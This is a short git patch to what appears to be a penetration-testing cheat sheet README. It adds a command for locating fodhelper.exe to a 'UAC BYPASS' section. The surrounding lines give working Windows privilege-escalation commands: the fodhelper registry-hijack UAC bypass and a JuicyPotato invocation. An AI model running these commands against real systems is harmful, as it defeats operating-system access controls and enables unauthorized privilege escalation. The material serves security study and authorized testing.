From 65ba5c001ada729758297d0cb949eb05ff4184af Mon Sep 17 00:00:00 2001
From: Joe Totes <59018247+Totes5706@users.noreply.github.com>
Date: Mon, 26 Sep 2022 23:32:00 -0400
Subject: [PATCH] Update README.md

---
 README.md | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/README.md b/README.md
index 0006737..e4df708 100644
--- a/README.md
+++ b/README.md
@@ -903,8 +903,11 @@ JuicyPotato.exe -t * -p {run.exe} -l 8003
 https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md
 
 # UAC BYPASS
+where /r C:\windows fodhelper.exe
+
  New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value {C:\Path\to\Exploit\exploit.exe} -Force
 New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force
+
 cmd -> fodhelper
 
 powershell Start-Process C:\Windows\System32\fodhelper.exe -WindowStyle Hidden